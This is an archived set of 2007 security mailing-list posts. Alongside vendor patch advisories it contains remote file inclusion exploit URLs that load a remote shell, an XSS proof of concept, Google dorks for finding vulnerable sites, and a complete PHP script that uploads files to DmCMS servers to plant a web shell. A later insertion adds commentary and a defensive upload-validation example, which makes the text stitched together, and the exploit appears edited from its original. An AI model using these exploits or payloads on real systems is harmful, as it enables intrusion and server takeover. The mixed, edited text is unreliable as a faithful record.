Post Revolution Remote File Inclusion

2007-04-23 Thread InyeXion
~~
  Post Revolution Remote File Inclusion
~~
  Affected Software : Post Revolution 6.6 / 7.0 Release Candidate 2
  Download ........ : http://www.fabio.com.ar/postrev/
  Risk ............ : high
  Date ............ : 25/3/2007
  Found by ........ : InyeXion
  Contact ......... : InyeXion[at]gmail.com
  Web ............. : Www.InyeXion.com.ar
~~

 Affected File: 
   
/common.php
/themes/default/preview_post_completo.php

 Vulnerable Code:

/common.php

Line [10]   include ($dir."themes/".$config_data["template"]."/encabezado.php");
Line [16]   include ($dir."themes/".$config_data["template"]."/cuerpo.php");
Line [22]   include ($dir."themes/".$config_data["template"]."/pie.php");
Line [37]   include ($dir."themes/".$config_data["template"]."/menu_principal.php");
Line [49]   include ($dir."themes/".$config_data["template"]."/error.php");
Line [129]  include ($dir."themes/".$config_data["template"]."/login_form.php");
Line [135]  include ($dir."themes/".$config_data["template"]."/logout.php");
Line [174]  include ($dir."language/".$config_data["lang"].".php");
Line [272]  include ($dir."language/".$config_data["lang"].".php");
Line [282]  include ($dir."themes/".$config_data["template"]."/seccion.php");
Line [360]  include ($dir."language/".$config_data["lang"].".php");
Line [446]  include ($dir."themes/".$config_data["template"]."/post.php");
Line [460]  include ($dir."language/".$config_data["lang"].".php");
Line [543]  include ($dir."themes/".$config_data["template"]."/archivo_noticias.php");
Line [549]  include ($dir."themes/".$config_data["template"]."/cuerpo_archivo.php");
Line [570]  include ($dir."language/".$config_data["lang"].".php");
Line [628]  include ($dir."themes/".$config_data["template"]."/post_completo.php");
Line [641]  include ($dir."language/".$config_data["lang"].".php");
Line [661]  include ($dir."language/".$config_data["lang"].".php");
Line [680]  include ($dir."themes/".$config_data["template"]."/posts_usuario.php");
Line [692]  include ($dir."language/".$config_data["lang"].".php");
Line [715]  include ($dir."themes/".$config_data["template"]."/comment_encabezado.php");
Line [750]  include ($dir."themes/".$config_data["template"]."/comment.php");
Line [770]  include ($dir."themes/".$config_data["template"]."/comment_form.php");
Line [776]  include ($dir."themes/".$config_data["template"]."/info.php");
Line [782]  include ($dir."themes/".$config_data["template"]."/info.php");
Line [1054] include ($dir."language/".$config_data["lang"].".php");
Line [1106] include ($dir."themes/".$config_data["template"]."/encuesta_head.php");
Line [1124] include ($dir."themes/".$config_data["template"]."/encuesta_opc.php");
Line [1128] include ($dir."themes/".$config_data["template"]."/encuesta_pie.php");
Line [1159] include ($dir."themes/".$config_data["template"]."/encuesta_head_ver.php");
Line [1180] include ($dir."themes/".$config_data["template"]."/encuesta_opc_ver.php");
Line [1183] include ($dir."themes/".$config_data["template"]."/encuesta_pie_ver.php");
Line [1231] include ($dir."themes/".$config_data["template"]."/encuestas_anteriores.php");
Line [1242] include ($dir."themes/".$config_data["template"]."/tagmenu.php");
Line [1297] include ($dir."themes/".$config_data["template"]."/tagpost.php");
Line [1310] include ($dir."language/".$config_data["lang"].".php");
Line [1482] include ($dir."language/".$config_data["lang"].".php");
Line [1506] include ($dir."themes/".$config_data["template"]."/categoria_enlace.php");
Line [1521] include ($dir."themes/".$config_data["template"]."/enlacefila.php");
Line [1570] include ($dir."config.php");
Line [1676] include ($dir."language/".$config_data["lang"].".php");
Line [1678] include ($dir."themes/".$config_data["template"]."/buscar.php");
Line [1685] include ($dir."language/".$config_data["lang"].".php");
Line [1723] include ($dir."themes/".$config_data["template"]."/resultado.php");
Line [1730] include ($dir."language/".$config_data["lang"].".php");
Line [1766] include ($dir."themes/".$config_data["template"]."/busq-dato.php");
Line [1772] include ($dir."themes/".$config_data["template"]."/busq-resultado.php");
Line [1778] inc

c-arbre <= Multiple Remote File Include Vulnerability

2007-04-23 Thread Mohandko
# c-arbre <= Multiple Remote File Include Vulnerability
# D.Script: 
http://fresh.t-systems-sfr.com/unix/src/www/c-arbre_0.6PR7_full.tar.gz
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit:[Path]/c-arbre/espaces/communiques/annotations.php?root_path=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm


[SECURITY] [DSA 1279-1] New webcalendar packages fix cross-site scripting

2007-04-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1279-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                          Moritz Muehlenhoff
April 22nd, 2007                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: webcalendar
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-6669

It was discovered that WebCalendar, a PHP-based calendar application,
performs insufficient sanitising in the exports handler, which allows
injection of web script.

For the old stable distribution (sarge) this problem has been fixed in
version 0.9.45-4sarge7.

The stable distribution (etch) no longer contains WebCalendar packages.

For the unstable distribution (sid) this problem has been fixed in
version 1.0.5-2.

We recommend that you upgrade your webcalendar package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7.dsc
  Size/MD5 checksum:  608 0c12e6c6307413350af264045a4df964

http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7.diff.gz
  Size/MD5 checksum:13013 ced8d9c6f7d52a42c3297a685547cb06

http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45.orig.tar.gz
  Size/MD5 checksum:   612360 a6a66dc54cd293429b604fe6da7633a6

  Architecture independent components:


http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7_all.deb
  Size/MD5 checksum:   629712 39fca1d949580d18e1e293a1c181b1a8

  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGK3fhXm3vHE4uyloRAiHOAJ0QtrQgIsQBKm6qCmWWfBwRWG6G0gCffVxw
MuZS2n/wJveeDEn8ZJUPrv4=
=CkBR
-END PGP SIGNATURE-



Ripe Website Manager (<= 0.8.4) - SQL Injection Vulnerability and Cross-Site Scripting Exploit

2007-04-23 Thread john



Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit

Discovered by John Martinelli (http://john-martinelli.com)
Google dork: "Powered by Ripe Website Manager"
(http://www.google.com/search?q=%22Powered+by+Ripe+Website+Manager)

Form action (POST): http://www.example.com/path/contact/index.php


[security bulletin] HPSBUX02183 SSRT061243 rev.1 - HP-UX sendmail, Remote Denial of Service (DoS)

2007-04-23 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00841370
Version: 1

HPSBUX02183 SSRT061243 rev.1 - HP-UX sendmail, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-04-16
Last Updated: 2007-04-17

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY

A potential security vulnerability has been identified with HP-UX running 
sendmail. This vulnerability could allow a remote user to cause a Denial of 
Service (DoS).

References: none

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP-UX B.11.00 (obsolete) running sendmail 8.9.3 or sendmail 8.11.1,
HP-UX B.11.11 running sendmail 8.9.3 or sendmail 8.11.1,
HP-UX B.11.23 running sendmail 8.11.1.

BACKGROUND

To determine if a system has an affected version, search the output of "swlist 
-a revision -l fileset" for an affected fileset. Then determine if the 
recommended patch or update is installed.

AFFECTED VERSIONS

For sendmail 8.11.1
HP-UX B.11.23
===
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_35485 or subsequent

HP-UX B.11.11
===
SMAIL-UPGRADE.INETSVCS-SMAIL
action: install revision B.11.11.02.004 or subsequent

HP-UX B.11.00
===
SMAIL-811.INETSVCS-SMAIL
action: remove (use sendmail 8.9.3) or upgrade to HP-UX B.11.11

For sendmail 8.9.3
HP-UX B.11.11
===
InternetSrvcs.INETSVCS-RUN
action: install PHNE_35484 or subsequent

For sendmail 8.9.3
HP-UX B.11.00
=
InternetSrvcs.INETSVCS-RUN
action: install PHNE_35483 or subsequent

END AFFECTED VERSIONS

Note:
sendmail 8.13.3 currently available from http://software.hp.com does not 
exhibit this DoS issue.
sendmail 8.11.1 is no longer available from http://software.hp.com for HP-UX 
B.11.11; customers are encouraged to upgrade to sendmail 8.13.3.

RESOLUTION

HP has made the following patches available to resolve the issue.
The patches are available from http://itrc.hp.com

For sendmail 8.11.1, HP-UX B.11.23
Install: PHNE_35485 or subsequent
sendmail -bs banner: Sendmail 8.11.1 (Revision 1.10)/8.11.1
what(1) string: version.c 8.11.1 (Berkeley) - 01 December 2006 (PHNE_35485)

For sendmail 8.11.1, HP-UX B.11.11
Please write to [EMAIL PROTECTED] for more information.

For sendmail 8.11.1, HP-UX B.11.00
Use sendmail 8.9.3 or upgrade to B.11.11 or subsequent. There will be no update 
to sendmail 8.11.1 for HP-UX B.11.00 to resolve the vulnerability.

For sendmail 8.9.3, HP-UX B.11.11
Install: PHNE_35484 or subsequent
sendmail -bs banner: Sendmail 8.9.3 (Revision 1.10)/8.9.3
what(1) string: version.c 8.9.3 (Berkeley) 01 December 2006 (PHNE_35484)

For sendmail 8.9.3, HP-UX B.11.00
Install: PHNE_35483 or subsequent
sendmail -bs banner: Sendmail 8.9.3 (Revision 1.10)/8.9.3
what(1) string: version.c 8.9.3 (Berkeley) 01 December 2006 (PHNE_35483)

MANUAL ACTIONS: Yes - NonUpdate
HP-UX B.11.11 sendmail 8.11.1 - Write to [EMAIL PROTECTED]
HP-UX B.11.00 sendmail 8.11.1 - Use sendmail 8.9.3 or upgrade to HP-UX B.11.11 
or subsequent
HP-UX B.11.23 sendmail 8.11.1 - No manual actions
HP-UX B.11.11 sendmail 8.9.3 - No manual actions
HP-UX B.11.00 sendmail 8.9.3 - No manual actions

PRODUCT SPECIFIC INFORMATION

HP_UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all 
HP-issued Security Bulletins to provide a subset of recommended actions that 
potentially affect a specific HP-UX system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do?_productNumber=B6834AA

HISTORY:
Version: 1 (rev.1) - 16 April 2007 Initial release

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subsc

phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit

2007-04-23 Thread john



phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit

Discovered by John Martinelli (http://john-martinelli.com)
Google dork: http://www.google.com/search?q=+%22Powered+by+phpMySpace+Gold+8.10%22

Form action (GET): http://www.example.com/path/modules/news/article.php



3proxy 0.5.3i bugfix release

2007-04-23 Thread Vladimir Dubrovin


Background:

3proxy [1] is a universal, multifunctional, free open-source proxy server
with support for multiple protocols (HTTP/HTTPS/FTP over HTTP, POP3, FTP,
SOCKS 4/4.5/5, UDP and TCP port mapping, DNS proxy), ACL-based access
control, proxy chaining, traffic accounting, bandwidth limitation,
configurable logging, etc., for Windows/Linux/Unix.

Description:

On April 14 the 3proxy development team released the urgent 0.5.3h update
[2] for 3proxy, fixing a stack-based buffer overflow vulnerability in both
the Windows and Linux/Unix 3proxy versions 0.5-0.5.3g and in the 0.6-devel
branch before the date of the fix (CVE-2007-2031) [3]. The vulnerability
was found during a bug report investigation. The binary 3proxy 0.6-devel
distribution is compiled with stack protection.

On April 20 the reviewed 0.5.3i version [2] of 3proxy was released, fixing
a few security-unrelated functionality issues with bandwidth limitation and
traffic limitation.

Update information:

All 3proxy users are advised to update to the latest 0.5.3i (or at least
0.5.3h) or 0.6-devel version [4].

Please subscribe to the three-proxy-announce mailing list [5] to be
immediately informed of new 3proxy releases.

Announce:

Version 0.6 of 3proxy introduces extended access control / traffic control
features and plugin/extension support. Windows authentication is in beta
testing, a regular-expression filtering/rewriting plugin is in alpha
testing, an LDAP plugin is in development, and antiviral plugins are
planned for development. We invite port maintainers, developers and beta
testers.

References:

[1] 3proxy official homepage
http://3proxy.ru/
[2] 3proxy 0.5.3i Changelog
http://3proxy.ru/0.5.3i/Changelog.txt
[3] CVE-2007-2031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2031
[4] 3proxy download page
http://3proxy.ru/download/
[5] 3proxy announcements mailing list at Sourceforge
https://lists.sourceforge.net/lists/listinfo/three-proxy-announce



TJSChat Version 0.95 Cross Site Scripting

2007-04-23 Thread the_3dit0r
   Xmor$ Security Vulnerability Research TM


# Title: TJSChat Version 0.95 Cross Site Scripting 


# Author..: [the_Edit0r]
# HomePage: [Www.XmorS-SEcurity.coM]
[Www.XmorS.coM]
# Location ...: [Iran]
# Software ...: [TJSChat] 
# Site Script : [http://www.toutjavascript.com]
# We ArE .: [ 
Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]




--- proof Of Concept ---


 www.example.com/[path]/you.php?user=alert(/the_Edit0r/);


---


# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]




acvsws_php5_v1.0 <= Multiple Remote File Include Vulnerability

2007-04-23 Thread Mohandko
# acvsws_php5_v1.0 <= Multiple Remote File Include Vulnerability
# D.Script: http://www.acvsnet.net/DNNACVS/Portals/0/_Commun/WebServices/acvsws_php5_v1.0_release.zip/
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit:[Path]/inc_ACVS/SOAP/Transport.php?CheminInclude=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
#Greetz To: aLL mY Friends


RE: Yet another SQL injection framework

2007-04-23 Thread Greg Merideth
The script simply hides or shows the link on the page which points to
sf.

http://sourceforge.net/projects/injection-fwk/

-Original Message-
From: Nick Boyce [mailto:[EMAIL PROTECTED] 
Sent: Friday, April 20, 2007 9:13 AM
To: bugtraq@securityfocus.com
Cc: Guillermo Marro
Subject: Re: Yet another SQL injection framework

On 4/19/07, Guillermo Marro <[EMAIL PROTECTED]> wrote:

> FG-Injector is a free tool that leverages the pentester's work by
> facilitating the exploitation of SQL Injection vulnerabilities.
[...]
> Get both, sources and a windows binary from:
> http://www.flowgate.net/?lang=en&seccion=herramientas

Um .. when I click on the link for "FG-Injector" at the above site
with my NoScript-enabled Firefox all I see is what looks like a server
log entry for my interaction :

aaa.bbb.ccc.ddd Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 /injector

This is presumably because the actual links are infested with Javascript:

onClick="javascript:showStaff('injector')"

Since I'm following links in an email on a security mailing list I'm
disinclined to disable NoScript - any chance you can convert the links
into normal HREFs ?

I could go and grab your Javascript library and figure out what
'showStaff' does ... but I'd rather just click on an old-school link.

Cheers
Nick Boyce
-- 
I speak to all bloggers everywhere: just shut up for a second and let
me think, will you?
 -- blog comment at http://it-gears.blogspot.com/   :-)



DmCMS Shell Uploading

2007-04-23 Thread security
Hello
Title : DmCMS Shell Upload
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : [EMAIL PROTECTED]

File:
includes/upload_file.php
After some conditions are met, it will allow you to upload any file you want;
the exploit here is the proof.

exploit :

#!/usr/bin/php -q -d short_open_tag=on
<?php
print_r('/* site: http://www.soqor.net */');
if ($argc < 4) {
    print_r('
/* -- */
/* Usage: php ' . $argv[0] . ' host path topath
/* Example:   */
/*php ' . $argv[0] . ' localhost /dmcms/ ../media/
/**/
');
    die;
}

error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);

// Fetch a URL: file_get_contents() when available, fopen()/fread() otherwise.
function get_page($url)
{
    if (function_exists("file_get_contents")) {
        return file_get_contents($url);
    }
    $contents = '';
    $fp = fopen($url, "r");
    while ($line = fread($fp, 1024)) {
        $contents .= $line;
    }
    fclose($fp);
    return $contents;
}

// Send one raw HTTP request to $host:$port and leave the full response in $html.
function connect($packet)
{
    global $host, $port, $html;
    $con = fsockopen(gethostbyname($host), $port);
    if (!$con) {
        echo '[-] Error - No response from ' . $host . ':' . $port;
        die;
    }
    fputs($con, $packet);
    $html = '';
    while (!feof($con)) {
        $html .= fread($con, 1024);
    }
    fclose($con);
}

$data = "";
$boundary = "---7d62702f250530";   // the body parts and the Content-Type header must use the same string

// Append one multipart/form-data part to $data; "init" appends the closing
// boundary, "clean" resets the buffer.
function add_data($name, $value, $type = "no", $filename = "")
{
    global $data, $boundary;
    if ($type == "file") {
        $data .= "--$boundary\r\n"
               . "Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\"\r\n"
               . "Content-Type: text/plain\r\n"
               . "\r\n"
               . $value . "\r\n";
    } elseif ($type == "init") {
        $data .= "--$boundary--\r\n";
    } elseif ($type == "clean") {
        $data = "";
    } else {
        $data .= "--$boundary\r\n"
               . "Content-Disposition: form-data; name=\"$name\"\r\n"
               . "Content-Type: text/plain\r\n"
               . "\r\n"
               . $value . "\r\n";
    }
}

$host = $argv[1];
$path = $argv[2];
$default_path = $argv[3];
$port = 80;

$p = 'http://' . $host . ':' . $port . $path;

echo "\n[+] Trying to Upload File";

$cookie = "Master=HACKERS20%PAL";
$contents = '';   // body of the uploaded file (left empty here)

add_data("empty.php", "", "file", "File1");
add_data("soqor.php", $contents, "file", "File2");
add_data("soqor.php", $contents, "file", "File3");
add_data('', '', "init");

$packet  = "POST " . $p . "includes/upload_file.php?default_path=$default_path HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Referer: http://" . $host . $path . "ok.php?do=act\r\n";
$packet .= "Accept-Language: it\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=$boundary\r\n";
$packet .= "Accept-Encoding: gzip, deflate\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Cookie: " . $cookie . "\r\n\r\n";
$packet .= $data;
connect($packet);

// The original test was eregi($default_path, $html); a case-insensitive
// substring check does the same job without the removed ereg functions.
if (stripos($html, $default_path) === false) {
    echo "\n/* [+] Successfully Exploited";
}
echo("\n/* Visit us : WwW.SoQoR.NeT   */\n/**/");
?>
#WwW.SoQoR.NeT
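The script above succeeds because the endpoint accepts a client-named .php file and a client-chosen destination directory (the default_path query parameter), and because an empty decoy in File1 is followed by the real payload in File2 and File3. The PHP below is an added example, not DmCMS code: an upload handler that rejects each of those three things. The storage root, the extension allowlist and the size cap are this example's assumptions, and the $_FILES-style entries at the bottom are constructed, not captured from a real request.

```php
<?php
// Added example, not DmCMS code: an upload handler that rejects what the
// exploit above posts to includes/upload_file.php. UPLOAD_ROOT, ALLOWED_EXT
// and MAX_BYTES are assumptions; the $files/$mimes arrays are constructed.
declare(strict_types=1);

const UPLOAD_ROOT = '/var/www/uploads';     // fixed server-side; never taken from the request
const MAX_BYTES   = 2 * 1024 * 1024;
const ALLOWED_EXT = [                       // extension => MIME type the bytes must really have
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
    'pdf' => 'application/pdf',
];

/**
 * Vet one uploaded file. $file is one $_FILES entry; $detectedMime is what
 * the server derived from the received bytes (finfo), never the client's
 * Content-Type. Returns [true, storage path] or [false, reason].
 */
function vet_upload(array $file, string $detectedMime): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'transfer error ' . $file['error']];
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_BYTES) {
        return [false, 'size out of range'];
    }
    // Only the extension is taken from the client name, and only if it is on
    // the allowlist; "soqor.php" never reaches the disk under any name.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_EXT)) {
        return [false, "extension '$ext' not allowed"];
    }
    if (ALLOWED_EXT[$ext] !== $detectedMime) {
        return [false, "content is $detectedMime, not " . ALLOWED_EXT[$ext]];
    }
    // Server-chosen random name inside a fixed directory: a query parameter
    // such as the exploit's default_path=../media/ has nothing to influence.
    return [true, UPLOAD_ROOT . '/' . bin2hex(random_bytes(16)) . '.' . $ext];
}

/**
 * Run vet_upload() over every field of a $_FILES array, so a check that
 * looks only at the first field (File1 is an empty decoy in the exploit)
 * cannot be walked around with File2 and File3. $mimes maps field name to
 * the finfo result for that field; in a live handler compute it as
 *   (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name'])
 * and store accepted files with move_uploaded_file($file['tmp_name'], $path).
 */
function vet_all(array $files, array $mimes): array
{
    $decisions = [];
    foreach ($files as $field => $file) {
        $decisions[$field] = vet_upload($file, $mimes[$field] ?? 'application/octet-stream');
    }
    return $decisions;
}

// Constructed input: the three parts the exploit sends, plus one real image.
$files = [
    'File1' => ['name' => 'empty.php', 'size' => 0,     'error' => UPLOAD_ERR_OK, 'tmp_name' => '/tmp/phpA1'],
    'File2' => ['name' => 'soqor.php', 'size' => 1200,  'error' => UPLOAD_ERR_OK, 'tmp_name' => '/tmp/phpA2'],
    'File3' => ['name' => 'soqor.php', 'size' => 1200,  'error' => UPLOAD_ERR_OK, 'tmp_name' => '/tmp/phpA3'],
    'photo' => ['name' => 'cat.jpg',   'size' => 48213, 'error' => UPLOAD_ERR_OK, 'tmp_name' => '/tmp/phpA4'],
];
$mimes = ['File1' => 'application/x-empty', 'File2' => 'text/x-php',
          'File3' => 'text/x-php',          'photo' => 'image/jpeg'];

foreach (vet_all($files, $mimes) as $field => [$ok, $info]) {
    printf("%-5s %-10s -> %s\n", $field, $files[$field]['name'], $ok ? "store as $info" : "reject: $info");
}
```

Running it prints a reject line for File1 (size 0), File2 and File3 (extension php not allowed) and a store line with a random .jpg name for the photo. The exploit also replays a fixed Master cookie; whatever that satisfies in DmCMS, an upload action should be tied to an authenticated server-side session rather than to a cookie value the client can choose.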


[ MDKSA-2007:093 ] - Updated zziplib packages fix vulnerability

2007-04-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:093
 http://www.mandriva.com/security/
 ___
 
 Package : zziplib
 Date: April 23, 2007
 Affected: Corporate 4.0
 ___
 
 Problem Description:
 
 A stack-based buffer overflow in the ZZIPlib library could allow
 user-assisted remote attackers to cause an application crash (DoS)
 or execute arbitrary code via a long filename.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1614
 ___
 
 Updated Packages:
 
 Corporate 4.0:
 a0ac9e92d0beee7726739000791e6748  
corporate/4.0/i586/zziplib0-0.13.33-4.1.20060mlcs4.i586.rpm
 1518189e431ccd97aa491a4591de80d6  
corporate/4.0/i586/zziplib0-devel-0.13.33-4.1.20060mlcs4.i586.rpm 
 c17957866cab01574723960484e792a9  
corporate/4.0/SRPMS/zziplib-0.13.33-4.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 91e3feceacc5f9fd7629525d1be8b951  
corporate/4.0/x86_64/zziplib0-0.13.33-4.1.20060mlcs4.x86_64.rpm
 641b79b72b74306264f8cc40b89ecf68  
corporate/4.0/x86_64/zziplib0-devel-0.13.33-4.1.20060mlcs4.x86_64.rpm 
 c17957866cab01574723960484e792a9  
corporate/4.0/SRPMS/zziplib-0.13.33-4.1.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGLO2pmqjQ0CJFipgRAh2lAJsFOiiEm3c5n10Jlbdy2D2FOGXq9ACg7YDJ
/HL9x4tONQFyI8wRo+wDE3M=
=jMiN
-END PGP SIGNATURE-



[ GLSA 200704-20 ] NAS: Multiple vulnerabilities

2007-04-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: NAS: Multiple vulnerabilities
  Date: April 23, 2007
  Bugs: #171428
ID: 200704-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


The Network Audio System is vulnerable to a buffer overflow that could
result in the execution of arbitrary code with root privileges.

Background
==

NAS is a network transparent, client/server audio transport system.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  media-libs/nas   < 1.8b   >= 1.8b

Description
===

Luigi Auriemma has discovered multiple vulnerabilities in NAS, some of
which include a buffer overflow in the function accept_att_local(), an
integer overflow in the function ProcAuWriteElement(), and a null
pointer error in the function ReadRequestFromClient().

Impact
==

An attacker having access to the NAS daemon could send an overly long
slave name to the server, leading to the execution of arbitrary code
with root privileges. A remote attacker could also send a specially
crafted packet containing an invalid client ID, which would crash the
server and result in a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All NAS users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/nas-1.8b"

References
==

  [ 1 ] CVE-2007-1543
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1543
  [ 2 ] CVE-2007-1544
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1544
  [ 3 ] CVE-2007-1545
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1545
  [ 4 ] CVE-2007-1546
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1546
  [ 5 ] CVE-2007-1547
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1547

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-20.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




[ MDKSA-2007:092 ] - Updated freeradius packages fix vulnerability

2007-04-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:092
 http://www.mandriva.com/security/
 ___
 
 Package : freeradius
 Date: April 23, 2007
 Affected: Corporate 4.0
 ___
 
 Problem Description:
 
 Multiple buffer overflows were found in the FreeRADIUS package version
 1.0.4 and prior that could allow a remote attacker to cause a crash
 via the rlm_sqlcounter module (CVE-2005-4746).
 
 As well, an SQL injection vulnerability was also found in the
 rlm_sqlcounter that could allow a remote attacker to execute arbitrary
 SQL commands via unknown attack vectors (CVE-2005-4745).
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4745
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4746
 ___
 
 Updated Packages:
 
 Corporate 4.0:
 523055be4399355565d6175d7df13ca7  
corporate/4.0/i586/freeradius-1.0.4-2.4.20060mlcs4.i586.rpm
 4e000a3cb2c8cb2f3359a961878a310a  
corporate/4.0/i586/libfreeradius1-1.0.4-2.4.20060mlcs4.i586.rpm
 3e9f17beada7d6d10235c6db8156a77a  
